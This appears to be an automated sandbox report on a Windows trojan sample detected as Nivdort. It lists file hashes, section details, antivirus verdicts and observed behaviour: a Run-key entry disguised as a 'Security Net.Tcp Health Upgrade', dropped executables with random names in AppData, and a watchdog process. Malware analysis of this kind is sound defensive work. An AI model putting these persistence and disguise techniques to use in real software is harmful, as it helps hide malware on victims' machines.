Analysis Date: 2014-01-20 22:22:21
MD5: c2307ce655194784b31fb5559cc87731
SHA1: 41b7f75abadedb7f65c146e39c95cbec5d114980

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 9f2543fab5ce728d1810318aab5d79b7 sha1: ed3a1a68c4b3c3f628fcc8dcce737177bd9dcc96 size: 118272
Section: .rdata md5: 7827a38d6d97260d8276025d4c51e65b sha1: b93bef2eca095e3f6e95533e750bfc6b051e9832 size: 17920
Section: .data md5: 8f765e6c9f83ad84710aadbe52fd852e sha1: 7695ffe51f759d1b9b1cd5ce3f6d44d573cdf483 size: 16384
Timestamp: 2013-06-20 16:32:50
Packer: Microsoft Visual C++ ?.?
PEhash: 93fa9ac978fdf2d5663ba2e2c512b0529b894206
AV msse: TrojanSpy:Win32/Nivdort.G
AV avira: TR/Spy.Nivdort.G.52
AV avg: Agent4.BNGM

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Security Net.Tcp Health Upgrade ➝ C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.trs
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\nsfonweetrj.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe"

Network Details:

Raw Pcap

Strings